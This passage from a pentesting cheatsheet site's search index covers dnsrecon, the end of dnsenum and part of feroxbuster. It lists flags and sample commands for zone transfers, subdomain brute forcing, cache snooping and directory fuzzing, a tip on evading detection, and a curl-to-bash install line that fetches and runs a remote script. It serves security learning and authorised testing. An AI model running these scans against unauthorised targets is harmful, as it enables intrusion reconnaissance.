style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/wordlists/dnsmap.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-run\"\u003eExample Full Run\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsenum --dnsserver 8.8.8.8 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        --enum \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        -p \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e -s \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        --threads \u003cspan style=\"color:#ae81ff\"\u003e20\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        -o results.xml \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e        example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"dnsenum"},{"content":"dnsrecon Cheatsheet Type: Versatile DNS reconnaissance 
— multiple techniques, customisable output formats\nInstallation sudo apt install dnsrecon # or git clone https://github.com/darkoperator/dnsrecon.git pip3 install -r requirements.txt Basic Usage dnsrecon -d \u0026lt;domain\u0026gt; dnsrecon -d example.com Scan Types (-t) Type Description std Standard — A, AAAA, NS, SOA, MX, TXT records axfr Zone transfer attempt on all nameservers brt Brute force subdomains from wordlist rvl Reverse lookup on IP range goo Google scraping for subdomains snoop Cache snooping on nameservers tld Check all TLD variations of domain zonewalk DNSSEC zone walking (NSEC enumeration) srv SRV record enumeration bing Bing scraping for subdomains crt Certificate transparency logs Common Flags Flag Description -d \u0026lt;domain\u0026gt; Target domain -t \u0026lt;type\u0026gt; Scan type (see table above) -D \u0026lt;wordlist\u0026gt; Wordlist for brute force (brt) -n \u0026lt;nameserver\u0026gt; Use specific nameserver -r \u0026lt;cidr\u0026gt; IP range for reverse lookups -c \u0026lt;file\u0026gt; Save output to CSV -j \u0026lt;file\u0026gt; Save output to JSON -x \u0026lt;file\u0026gt; Save output to XML --db \u0026lt;file\u0026gt; Save output to SQLite DB -f Filter wildcard results -a Perform AXFR on all nameservers --iw Continue brute force even if wildcard detected -v Verbose output --lifetime \u0026lt;s\u0026gt; Query lifetime in seconds --tcp Use TCP for queries -t std,brt Combine multiple scan types Common Commands # Standard enumeration (all record types) dnsrecon -d example.com -t std # Zone transfer attempt dnsrecon -d example.com -t axfr # Brute force subdomains dnsrecon -d example.com -t brt -D wordlist.txt # Reverse lookup on a range dnsrecon -r 192.168.1.0/24 -t rvl # Cache snooping dnsrecon -t snoop -n \u0026lt;nameserver\u0026gt; -D wordlist.txt # DNSSEC zone walking dnsrecon -d example.com -t zonewalk # Certificate transparency dnsrecon -d example.com -t crt # Multiple scan types at once dnsrecon -d example.com -t std,axfr,brt 
-D wordlist.txt # Use specific nameserver dnsrecon -d example.com -n 8.8.8.8 -t std # Output to JSON dnsrecon -d example.com -t std -j output.json # Output to CSV dnsrecon -d example.com -t brt -D wordlist.txt -c output.csv # Filter wildcards during brute force dnsrecon -d example.com -t brt -D wordlist.txt -f # Force brute force through wildcard dnsrecon -d example.com -t brt -D wordlist.txt --iw Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Run dnsrecon -d example.com \\ -t std,axfr,brt \\ -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -n 8.8.8.8 \\ -f \\ -j dnsrecon_results.json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/dnsrecon/","summary":"\u003ch1 id=\"dnsrecon-cheatsheet\"\u003ednsrecon Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Versatile DNS reconnaissance — multiple techniques, customisable output formats\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install dnsrecon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/darkoperator/dnsrecon.git\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install -r 
requirements.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"scan-types--t\"\u003eScan Types (\u003ccode\u003e-t\u003c/code\u003e)\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eType\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003estd\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eStandard — A, AAAA, NS, SOA, MX, TXT records\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eaxfr\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eZone transfer attempt on all nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ebrt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBrute force subdomains from wordlist\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ervl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReverse lookup on IP range\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003egoo\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGoogle scraping for 
subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esnoop\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCache snooping on nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003etld\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCheck all TLD variations of domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ezonewalk\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDNSSEC zone walking (NSEC enumeration)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esrv\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSRV record enumeration\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ebing\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBing scraping for subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecrt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCertificate transparency logs\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget domain\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;type\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eScan type (see table 
above)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-D \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist for brute force (\u003ccode\u003ebrt\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-n \u0026lt;nameserver\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse specific nameserver\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r \u0026lt;cidr\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIP range for reverse lookups\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to CSV\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-j \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to JSON\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to XML\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--db \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSave output to SQLite DB\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-f\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter wildcard results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePerform AXFR on all 
nameservers\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--iw\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eContinue brute force even if wildcard detected\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--lifetime \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuery lifetime in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--tcp\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse TCP for queries\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t std,brt\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCombine multiple scan types\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Standard enumeration (all record types)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Zone transfer attempt\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t axfr\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Brute force subdomains\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Reverse lookup on a range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -r 192.168.1.0/24 -t rvl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Cache snooping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -t snoop -n \u0026lt;nameserver\u0026gt; -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# DNSSEC zone walking\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t zonewalk\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Certificate transparency\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t crt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple scan types at once\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std,axfr,brt -D wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use specific nameserver\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -n 8.8.8.8 -t std\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t std -j output.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to CSV\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt -c output.csv\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter wildcards during brute 
force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt -f\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Force brute force through wildcard\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com -t brt -D wordlist.txt --iw\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-wordlists\"\u003eRecommended Wordlists\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"example-full-run\"\u003eExample Full Run\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ednsrecon -d example.com \u003cspan 
style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -t std,axfr,brt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -n 8.8.8.8 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -f \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -j dnsrecon_results.json\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"dnsrecon"},{"content":"feroxbuster Cheatsheet Type: Fast Rust-based web fuzzer — recursive directory brute forcing, wildcard detection, rich filtering\nInstallation sudo apt install feroxbuster # or curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash # or cargo install feroxbuster Basic Usage feroxbuster -u http://\u0026lt;ip\u0026gt; feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt Common Flags Flag Description -u \u0026lt;url\u0026gt; Target URL -w \u0026lt;wordlist\u0026gt; Wordlist (default: built-in if not specified) -t \u0026lt;n\u0026gt; Threads (default: 50) -x \u0026lt;ext\u0026gt; File extensions to append -d \u0026lt;n\u0026gt; Recursion depth (default: 4, 0 = unlimited) -r Follow redirects -k Disable TLS certificate verification -n Disable recursion -C \u0026lt;codes\u0026gt; Filter out status codes -s \u0026lt;codes\u0026gt; Only show these status codes -S \u0026lt;size\u0026gt; Filter by response size (bytes) -W \u0026lt;words\u0026gt; Filter by word 
count in response -L \u0026lt;lines\u0026gt; Filter by line count in response -X \u0026lt;regex\u0026gt; Filter by response body regex -H \u0026lt;header\u0026gt; Add custom header (repeatable) -b \u0026lt;cookie\u0026gt; Add cookie -m \u0026lt;methods\u0026gt; HTTP methods (default: GET) -o \u0026lt;file\u0026gt; Output to file -q Quiet — no banner or progress --json Output as JSON -v Verbose -T \u0026lt;seconds\u0026gt; Request timeout --rate-limit \u0026lt;n\u0026gt; Max requests per second -p \u0026lt;proxy\u0026gt; Use proxy (http/socks5) -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; HTTP Basic auth -a \u0026lt;agent\u0026gt; User-Agent string --dont-filter Disable wildcard filtering --auto-tune Automatically slow down on errors --collect-extensions Collect and scan discovered extensions --collect-words Build wordlist from responses --resume-from \u0026lt;file\u0026gt; Resume from a saved state file Common Commands # Basic scan with extensions feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -x php,html,txt # No recursion (flat scan) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -n # Limit recursion depth feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -d 2 # Filter out 404s and 403s feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -C 404,403 # Only show 200 and 301 feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -s 200,301 # Filter responses by size (remove default page noise) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -S 1234 # Filter by word count feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -W 25 # HTTPS with TLS skip feroxbuster -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k # Custom headers (e.g. 
API auth) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -H \u0026#34;Authorization: Bearer \u0026lt;token\u0026gt;\u0026#34; \\ -H \u0026#34;X-Custom: value\u0026#34; # Use proxy (Burp Suite) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -p http://127.0.0.1:8080 -k # POST requests feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m POST # Multiple HTTP methods feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m GET,POST,PUT # Output to file (also saves state for resume) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -o results.txt # JSON output feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --json -o results.json # Resume interrupted scan feroxbuster --resume-from ferox-\u0026lt;ip\u0026gt;.state # Rate limit (be polite / evade detection) feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --rate-limit 100 # Collect extensions seen in responses and scan them too feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-extensions # Build a wordlist from page content, then use it feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-words Virtual Host Discovery # feroxbuster doesn\u0026#39;t natively fuzz Host headers # Use with -H to manually set a specific host header, # or use ffuf/gobuster for vhost fuzzing feroxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \\ -H \u0026#34;Host: staging.example.com\u0026#34; Interactive Pause Menu While feroxbuster is running, press ENTER to open the interactive menu:\n[p]ause / [r]esume scanning [q]uit (saves state for --resume-from) [s]how stats [a]dd url to scan [f]ilter response by size Configuration File Default config: ~/.config/feroxbuster/ferox-config.toml\nwordlist = \u0026#34;/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\u0026#34; threads = 50 depth = 3 timeout = 7 status_codes = [200, 204, 301, 302, 307, 308, 401, 403] filter_status = [404] extensions = [\u0026#34;php\u0026#34;, 
\u0026#34;html\u0026#34;, \u0026#34;txt\u0026#34;] Recommended Wordlists /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt Example Full Run feroxbuster \\ -u http://example.com \\ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \\ -x php,html,txt,bak \\ -t 50 \\ -d 3 \\ -C 404,403 \\ -k \\ --auto-tune \\ -o ferox_results.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/feroxbuster/","summary":"\u003ch1 id=\"feroxbuster-cheatsheet\"\u003eferoxbuster Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast Rust-based web fuzzer — recursive directory brute forcing, wildcard detection, rich 